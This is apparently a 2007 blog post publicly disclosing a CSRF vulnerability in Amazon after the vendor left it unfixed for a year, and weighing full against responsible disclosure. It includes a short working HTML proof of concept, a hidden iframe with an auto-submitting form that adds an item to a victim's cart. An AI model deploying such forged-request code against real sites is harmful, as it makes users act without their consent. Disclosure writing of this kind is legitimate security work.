My Amazon Anniversary

15 Mar 2007

Today I am revealing an exploitable security vulnerability in Amazon. Before I do, I want to provide some history and context.

On this day last year, I informed Amazon about a pretty serious vulnerability and demonstrated it with a few examples and a detailed description. In the description, I explained how to exploit the infamous "1-Click" feature, causing victims to purchase items of my choosing without their knowledge or consent, and I stressed that the scope of the problem extended beyond my benign examples. After some mild prodding, I finally received a reply letting me know that my email had been received, the vulnerability had been verified, and Amazon considered fixing it a top priority.

This is usually the extent of my involvement in such affairs. It's remarkably easy to find vulnerabilities in web applications, so I see no reason to make a big deal out of every discovery. Plus, it's enough trouble to inform web sites about vulnerabilities (something many of my colleagues don't bother doing for good reasons), so once I've done so, I feel like I've fulfilled my ethical responsibility.

Despite my prodding, the vulnerability remains a year later.

I feel like Amazon has exploited my cooperative behavior and placed me in a moral dilemma. In fact, at this point, I feel like I've already done the wrong thing by withholding this information for so long. The silence ends today.

The following example demonstrates the problem:

  1. <iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe>
  2. <form name="csrf" action="http://amazon.com/gp/product/handle-buy-box" method="post" target="hidden">
  3. <input type="hidden" name="ASIN" value="059600656X" />
  4. </form>
  5. <script>document.csrf.submit();</script>

This exploit is pretty benign, because it only adds an item to your shopping cart. Always be sure to inspect your cart carefully each time you check out!

Yes, this is CSRF, and I plan to update my article in the next few days to include Amazon and Digg as examples, and I'll elaborate a bit more on the various techniques in use today.

Amazon has started requiring re-authentication in several places, so many actions are protected against CSRF. For example, the "1-Click" feature has been improved to protect against this, because adding a new address now requires re-authenticating. This is a good thing.

This entire affair has me rethinking my stance on full disclosure, something I alluded to in a recent interview. The wikipedia article on full disclosure has this to say about responsible disclosure:

One challenge with "responsible disclosure" is that some vendors do not respond, or inordinately delay their response, to vulnerability reports that are not public. As long as a vulnerability is not widely known to the public (with enough detail to reproduce the attack), vendors may refuse to fix the vulnerability or refuse to give it enough priority to actually repair it. Unfortunately, vulnerabilities reported to a vendor may already be exploited, or may soon be detected by someone with intent to exploit them.

This is my primary concern. There's nothing particularly sophisticated about this attack, so I feel confident that someone else has discovered it by now, and as a user of Amazon myself, I'm not comfortable with that.

The RFPolicy offers a reasonable middle-ground; perhaps that's the best approach.